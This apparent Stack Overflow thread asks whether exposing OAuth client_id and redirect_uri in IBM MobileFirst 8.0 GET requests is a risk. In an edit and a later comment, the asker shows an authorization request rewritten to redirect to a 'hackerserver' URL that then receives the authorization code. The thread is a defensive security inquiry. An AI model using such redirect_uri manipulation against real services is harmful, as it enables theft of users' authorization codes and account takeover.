# IBM Mobile First 8.0 oAuth flow "client_id" and "redirect_uri" exposed in GET Request

Tags: oauth, ibm-mobilefirst, mobilefirst-server

We are using IBM Mobile First 8.0 framework with our IOS application.
The framework uses oAuth2.0 flow for authentication flow.

I see client_id and redirect_uri are being passed to authorization endpoint in GET request. It seems this flow is actually taken care by Mobile First framework and I don't have any control over it.

```
    response_type=code
    scope=
    client_id=CLIENT_ID
    redirect_uri=REDIRECT_URL
```

What are the security vulnerabilities of exposing "client_id" and "redirect_uri" in GET Request?

EDIT:
I changed the redirect_uri in code and issues request to Authorization end point.

http://mobilefirstserver:port/mfp/api/az/v1/authorization?response_type=code&client_id=CLIENT_ID&scope=SCOPE&redirect_uri=http://hackerserver:port/context/getdata

I thought their was some whitelisting done in framework level but it is not the case.

This is what I see , the authorization_code is passed to hackerserver.
http://hackerserver:port/context/getdata?code=authorization_code

Comment: These two parameters are not considered 'secrets' as they simply identify the client and the URL it will be redirected to after authorization success.

Disclaimer: I've worked in the team that actually implemented this in IBM's Mobile First platform

Comment: is it possible to tweek the "redirect_uri" and change to some other value like evil.com?

Comment: Given it's using SSL transport, and the value is whitelisted at the server side (It should be so, contact IBM's support for confirmation) - this value should be considered safe (as long as the code is untempered, of course).

Depending on your specific configuration (it's only different when using a Web client, as opposed to iOS in your case), this value is generated and used internally by the platform to signal a successful authorization, so I think you're safe (I'm no longer part of this project and it might have changed - I'm only working according to my limited knowledge).

Answer (score 2, accepted):

There are no known risks of those values being exposed. Those values are used with other encrypted data in the client SDK to identify a client. They are not enough by themselves.

Also, as iddo mentioned in the comments, you are supposed to use SSL/TLS. Someone being able to listen in your traffic is a problem in itself, regardless of client IDs and whatnot.

Comment: is their is any white list done for redirect_uri in framework level?

Comment: I changed the redirect_uri in code and issues request to Authorization end point.
http://mobilefirstserver:port/mfp/api/az/v1/authorization?response_type=code&client_id=CLIENT_ID&scope=SCOPE&redirect_uri=http://hackerserver:port/context/getdata

I thought their was some whitelisting done in framework level but it is not the case.

This is what I see , the authorization_code is passed to hackerserver.
http://hackerserver:port/context/getdata?code=authorization_code